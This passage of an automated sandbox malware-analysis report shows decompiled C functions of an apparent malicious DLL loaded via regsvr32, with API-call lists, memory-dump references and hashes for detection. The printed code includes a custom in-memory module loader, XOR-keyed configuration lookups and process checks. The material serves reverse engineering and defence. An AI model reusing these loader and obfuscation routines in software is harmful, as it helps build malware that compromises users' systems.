				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E67CD1144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x67cd41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E67CD2118(_t40, _t30 + 4);
					}
				}
				_t23 = E67CD1444(_v44); // executed
				goto L7;
			}













                                                                                                                                                                  0x67cd14fa
                                                                                                                                                                  0x67cd14fb
                                                                                                                                                                  0x67cd1500
                                                                                                                                                                  0x67cd1508
                                                                                                                                                                  0x67cd1509
                                                                                                                                                                  0x67cd1513
                                                                                                                                                                  0x67cd1519
                                                                                                                                                                  0x67cd1522
                                                                                                                                                                  0x67cd1527
                                                                                                                                                                  0x67cd1545
                                                                                                                                                                  0x67cd159a
                                                                                                                                                                  0x67cd159b
                                                                                                                                                                  0x67cd159c
                                                                                                                                                                  0x67cd159c
                                                                                                                                                                  0x67cd154d
                                                                                                                                                                  0x67cd1553
                                                                                                                                                                  0x67cd1561
                                                                                                                                                                  0x67cd1565
                                                                                                                                                                  0x67cd156c
                                                                                                                                                                  0x67cd1574
                                                                                                                                                                  0x67cd1578
                                                                                                                                                                  0x67cd157a
                                                                                                                                                                  0x67cd1589
                                                                                                                                                                  0x67cd157c
                                                                                                                                                                  0x67cd1582
                                                                                                                                                                  0x67cd1582
                                                                                                                                                                  0x67cd157a
                                                                                                                                                                  0x67cd1591
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,67CD41C4,00000000), ref: 67CD1519
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?), ref: 67CD154D
                                                                                                                                                                    • Part of subcall function 67CD1144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?,?), ref: 67CD1151
                                                                                                                                                                    • Part of subcall function 67CD1144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 67CD1167
                                                                                                                                                                    • Part of subcall function 67CD1144: _snwprintf.NTDLL ref: 67CD118C
                                                                                                                                                                    • Part of subcall function 67CD1144: CreateFileMappingW.KERNELBASE(000000FF,67CD41C0,00000004,00000000,?,?), ref: 67CD11B1
                                                                                                                                                                    • Part of subcall function 67CD1144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A,?), ref: 67CD11C8
                                                                                                                                                                    • Part of subcall function 67CD1144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,67CD156A,0000000A), ref: 67CD11FD
                                                                                                                                                                  • ExitThread.KERNEL32 ref: 67CD159C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4209869662-0
                                                                                                                                                                  • Opcode ID: 6e88643053e1f3905edba2a621f5a7036b2dc65e07569fd328712c3769f5ceb7
                                                                                                                                                                  • Instruction ID: f87de784599a4417981167f3220383ce5ebbf9f0902fba42cca9d66e2d0b6221
                                                                                                                                                                  • Opcode Fuzzy Hash: 6e88643053e1f3905edba2a621f5a7036b2dc65e07569fd328712c3769f5ceb7
                                                                                                                                                                  • Instruction Fuzzy Hash: 32117972104201ABDB01CB69C885E9BBBFCAB5A704F120A16FB15E7150F734E644CB96
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1ADB, Relevance: 2.5, APIs: 2, Instructions: 48memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 84%
                                                                                                                                                                  			E67CD1ADB(void* __ecx) {
				void* _v8;
				char _v12;
				signed short _t15;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E67CD1697( &_v8,  &_v12,  *0x67cd41cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E67CD2087(_t22, _v8,  *0x67cd41cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_t15 = E67CD1E8A(_t22); // executed
						_v12 = _t15 & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x67cd4190, 0, _v8);
				}
				return _t25;
			}









                                                                                                                                                                  0x67cd1adb
                                                                                                                                                                  0x67cd1ade
                                                                                                                                                                  0x67cd1adf
                                                                                                                                                                  0x67cd1af5
                                                                                                                                                                  0x67cd1afe
                                                                                                                                                                  0x67cd1b03
                                                                                                                                                                  0x67cd1b1c
                                                                                                                                                                  0x67cd1b05
                                                                                                                                                                  0x67cd1b18
                                                                                                                                                                  0x67cd1b18
                                                                                                                                                                  0x67cd1b20
                                                                                                                                                                  0x67cd1b22
                                                                                                                                                                  0x67cd1b2a
                                                                                                                                                                  0x67cd1b32
                                                                                                                                                                  0x67cd1b3a
                                                                                                                                                                  0x67cd1b3c
                                                                                                                                                                  0x67cd1b3c
                                                                                                                                                                  0x67cd1b3a
                                                                                                                                                                  0x67cd1b4c
                                                                                                                                                                  0x67cd1b4c
                                                                                                                                                                  0x67cd1b57

                                                                                                                                                                  APIs
                                                                                                                                                                  • StrStrIA.KERNELBASE(00000000,67CD1CE6,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1B32
                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,67CD1CE6,?,00000000,00000000,?,?,?,67CD1CE6), ref: 67CD1B4C
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                  • Opcode ID: eb6460ec6e53da9aeb1d8bd1946283f175524c24a15952dfd8e6347f69b949b3
                                                                                                                                                                  • Instruction ID: f4f44c6bba7f701c16d3fe5d44c5c0fecfff7699029a59416472603edb4186be
                                                                                                                                                                  • Opcode Fuzzy Hash: eb6460ec6e53da9aeb1d8bd1946283f175524c24a15952dfd8e6347f69b949b3
                                                                                                                                                                  • Instruction Fuzzy Hash: 0B0184B6A00114FBDB018BA9CC41EAFB7BDEB9D340F124162AF00E3104F735DA01DAA4
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1444, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E67CD1444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x67cd41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x67cd41cc - 0x63698bc4 &  !( *0x67cd41cc - 0x63698bc4);
				_t18 = E67CD1060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x67cd41cc - 0x63698bc4 &  !( *0x67cd41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x67cd41cc - 0x63698bc4 &  !( *0x67cd41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E67CD1A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E67CD1F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E67CD126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E67CD142F(_t42);
					L8:
					return _t29;
				}
			}














                                                                                                                                                                  0x67cd144c
                                                                                                                                                                  0x67cd144e
                                                                                                                                                                  0x67cd146a
                                                                                                                                                                  0x67cd147b
                                                                                                                                                                  0x67cd1482
                                                                                                                                                                  0x67cd14e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd1484
                                                                                                                                                                  0x67cd1484
                                                                                                                                                                  0x67cd148e
                                                                                                                                                                  0x67cd1492
                                                                                                                                                                  0x67cd1497
                                                                                                                                                                  0x67cd149a
                                                                                                                                                                  0x67cd149f
                                                                                                                                                                  0x67cd14a3
                                                                                                                                                                  0x67cd14a8
                                                                                                                                                                  0x67cd14ad
                                                                                                                                                                  0x67cd14b1
                                                                                                                                                                  0x67cd14b6
                                                                                                                                                                  0x67cd14b7
                                                                                                                                                                  0x67cd14bb
                                                                                                                                                                  0x67cd14c0
                                                                                                                                                                  0x67cd14c8
                                                                                                                                                                  0x67cd14c8
                                                                                                                                                                  0x67cd14c0
                                                                                                                                                                  0x67cd14b1
                                                                                                                                                                  0x67cd14a3
                                                                                                                                                                  0x67cd14ca
                                                                                                                                                                  0x67cd14d3
                                                                                                                                                                  0x67cd14d7
                                                                                                                                                                  0x67cd14e1
                                                                                                                                                                  0x67cd14e7
                                                                                                                                                                  0x67cd14e7

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 67CD1060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,67CD1480,?,?,?,?,00000002,00000000,?,?), ref: 67CD1084
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10A6
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10BC
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10D2
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10E8
                                                                                                                                                                    • Part of subcall function 67CD1060: GetProcAddress.KERNEL32(00000000,?), ref: 67CD10FE
                                                                                                                                                                    • Part of subcall function 67CD1A5A: memcpy.NTDLL(00000000,00000002,67CD148E,?,?,?,?,?,67CD148E,?,?,?,?,?,?,00000002), ref: 67CD1A87
                                                                                                                                                                    • Part of subcall function 67CD1A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 67CD1ABA
                                                                                                                                                                    • Part of subcall function 67CD1F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 67CD1FB4
                                                                                                                                                                    • Part of subcall function 67CD126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 67CD12A6
                                                                                                                                                                    • Part of subcall function 67CD126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 67CD131B
                                                                                                                                                                    • Part of subcall function 67CD126D: GetLastError.KERNEL32 ref: 67CD1321
                                                                                                                                                                  • GetLastError.KERNEL32(?,?), ref: 67CD14C2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2673762927-0
                                                                                                                                                                  • Opcode ID: 6493382091ed6b1dbbcca059d49085b065d75c402498bcf92bad417865ccc47b
                                                                                                                                                                  • Instruction ID: 4b85070b657634d7fa46d279020ede98698805d31fd9aea663bd2ad6d50766c2
                                                                                                                                                                  • Opcode Fuzzy Hash: 6493382091ed6b1dbbcca059d49085b065d75c402498bcf92bad417865ccc47b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D110477601705ABD7209BED8C84D9B77BDAF8C308B058169EB05A7641FBA0E906C7A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                  Function 67D33BC0, Relevance: 16.7, APIs: 11, Instructions: 162COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • ___crtGetLocaleInfoA.LIBCMT ref: 67D33C12
                                                                                                                                                                    • Part of subcall function 67D3FA7E: _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 67D3FA8A
                                                                                                                                                                    • Part of subcall function 67D3FA7E: __crtGetLocaleInfoA_stat.LIBCMT ref: 67D3FA9F
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00000000,00000000), ref: 67D33C24
                                                                                                                                                                  • ___crtGetLocaleInfoA.LIBCMT ref: 67D33C44
                                                                                                                                                                  • ___crtGetLocaleInfoA.LIBCMT ref: 67D33C86
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 67D33C59
                                                                                                                                                                    • Part of subcall function 67D33A00: __calloc_impl.LIBCMT ref: 67D33A0F
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 67D33C9B
                                                                                                                                                                  • _free.LIBCMT ref: 67D33CB3
                                                                                                                                                                  • _free.LIBCMT ref: 67D33CF3
                                                                                                                                                                  • __calloc_crt.LIBCMT ref: 67D33D1D
                                                                                                                                                                  • _free.LIBCMT ref: 67D33D43
                                                                                                                                                                  • __invoke_watson.LIBCMT ref: 67D33D93
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Locale$Info$___crt__calloc_crt_free$A_statErrorLastUpdateUpdate::___calloc_impl__crt__invoke_watson
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1731282729-0
                                                                                                                                                                  • Opcode ID: 1a5636b247f22a40704e50a1f9e931fe6a5ff0b570614240f8885ec7e85dac62
                                                                                                                                                                  • Instruction ID: 0cbcacb847b2ea5cdf32c8823f86458a16a49b1231ffb5e560c541519466a9f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 1a5636b247f22a40704e50a1f9e931fe6a5ff0b570614240f8885ec7e85dac62
                                                                                                                                                                  • Instruction Fuzzy Hash: 525184B590422AEBEF108F759E41B9AFB79EF0A324F104895FA0CA2141EF71C9548B71
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D3E857, Relevance: 6.1, APIs: 4, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 67D3E86E
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 67D3E87F
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 67D3E89B
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 67D3E8C5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale_wcscmp
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1351282208-0
                                                                                                                                                                  • Opcode ID: 92780a96872c9aaa9804ae393cc1ac1d808b7925a66caa1e64e1c0e4a76b148b
                                                                                                                                                                  • Instruction ID: 1eb0ef6c73fc32b0934bd77f77cb4e662a91661d9d455fd923770380767c4077
                                                                                                                                                                  • Opcode Fuzzy Hash: 92780a96872c9aaa9804ae393cc1ac1d808b7925a66caa1e64e1c0e4a76b148b
                                                                                                                                                                  • Instruction Fuzzy Hash: D5018831944165FBF7005F55D845EC9B79CAF4E675B008C25FA08D60C0E760D940C7F5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD1F10, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD1F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x67cd41b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x67cd41bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x67cd41ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x67cd41a8 = _t5;
					 *0x67cd41b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x67cd41a4 = _t6;
					if(_t6 == 0) {
						 *0x67cd41a4 =  *0x67cd41a4 | 0xffffffff;
					}
					return 0;
				}
			}









                                                                                                                                                                  0x67cd1f11
                                                                                                                                                                  0x67cd1f1f
                                                                                                                                                                  0x67cd1f27
                                                                                                                                                                  0x67cd1f2c
                                                                                                                                                                  0x67cd1f76
                                                                                                                                                                  0x67cd1f76
                                                                                                                                                                  0x67cd1f2e
                                                                                                                                                                  0x67cd1f36
                                                                                                                                                                  0x67cd1f72
                                                                                                                                                                  0x67cd1f74
                                                                                                                                                                  0x67cd1f38
                                                                                                                                                                  0x67cd1f38
                                                                                                                                                                  0x67cd1f3d
                                                                                                                                                                  0x67cd1f4b
                                                                                                                                                                  0x67cd1f50
                                                                                                                                                                  0x67cd1f56
                                                                                                                                                                  0x67cd1f5e
                                                                                                                                                                  0x67cd1f63
                                                                                                                                                                  0x67cd1f65
                                                                                                                                                                  0x67cd1f65
                                                                                                                                                                  0x67cd1f6f
                                                                                                                                                                  0x67cd1f6f

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,67CD1C8E,74B063F0,00000000), ref: 67CD1F1F
                                                                                                                                                                  • GetVersion.KERNEL32 ref: 67CD1F2E
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32 ref: 67CD1F3D
                                                                                                                                                                  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 67CD1F56
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Process$CreateCurrentEventOpenVersion
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 845504543-0
                                                                                                                                                                  • Opcode ID: ce032296b3e5a79e749c00e578f47e7f881d86f8f6cc18fda0c028125ddc9b01
                                                                                                                                                                  • Instruction ID: 20c12737b4e337360f54e2c33a11dea2938aa9ccc48dcdfccef6a3ed0ed9d74c
                                                                                                                                                                  • Opcode Fuzzy Hash: ce032296b3e5a79e749c00e578f47e7f881d86f8f6cc18fda0c028125ddc9b01
                                                                                                                                                                  • Instruction Fuzzy Hash: CDF04971644210EFEB00ABB8A84B7813BB4A71B711F21401AFB51D91D0E7789242CB0C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D2DD7D, Relevance: 3.1, APIs: 2, Instructions: 72COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 67D2DDB2
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 67D2DE67
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DebuggerPresent_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2328436684-0
                                                                                                                                                                  • Opcode ID: abd04762f2dd34878fe0353ac99c1eec80738c02f19352917fbffb7f14301e7c
                                                                                                                                                                  • Instruction ID: 8a53c7bf7648dd15d70719932c87b81d52190378de629dc26854c4c92fb01491
                                                                                                                                                                  • Opcode Fuzzy Hash: abd04762f2dd34878fe0353ac99c1eec80738c02f19352917fbffb7f14301e7c
                                                                                                                                                                  • Instruction Fuzzy Hash: 6331C57580122CDBCB61DF64D8887C9B7B4BF0C324F6046EAE91CA7250EB349B858F55
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D35ED2, Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,67D2DE7B,?,?,?,00000001), ref: 67D35ED7
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 67D35EE0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: 1780c8cf3407b10b9c2a17034e3df932668e44bf09f0422e817093f897e77bfe
                                                                                                                                                                  • Instruction ID: b6a899234de5f55ba60a2709cdbf18c0764900abc8537fd11a891593ec1c1d38
                                                                                                                                                                  • Opcode Fuzzy Hash: 1780c8cf3407b10b9c2a17034e3df932668e44bf09f0422e817093f897e77bfe
                                                                                                                                                                  • Instruction Fuzzy Hash: 13B09271044218EBEE002B99D80AB8C3F28FB86EB2F004510F60D940548B6654508EB9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67DA1D40, Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: @$^0
                                                                                                                                                                  • API String ID: 0-2280991083
                                                                                                                                                                  • Opcode ID: 950aa7be2f9cf01adb89b81d180083039f638b070627134b886a30bd73d0b49b
                                                                                                                                                                  • Instruction ID: d8edf55ef7650fe6a7a257aa027cddb6850bbd4ef4549e5ca4cd7510bbb270a3
                                                                                                                                                                  • Opcode Fuzzy Hash: 950aa7be2f9cf01adb89b81d180083039f638b070627134b886a30bd73d0b49b
                                                                                                                                                                  • Instruction Fuzzy Hash: BDF131B45070518BEB08CF2DC492B6E7BA1B786328B448F2AD567D7786C63C58C5CB5C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD2485, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E67CD2485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x67cd41f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x67cd4240 = 1;
										__eflags =  *0x67cd4240;
										if( *0x67cd4240 != 0) {
											goto L60;
										}
										_t84 =  *0x67cd41f8;
										__eflags = _t84;
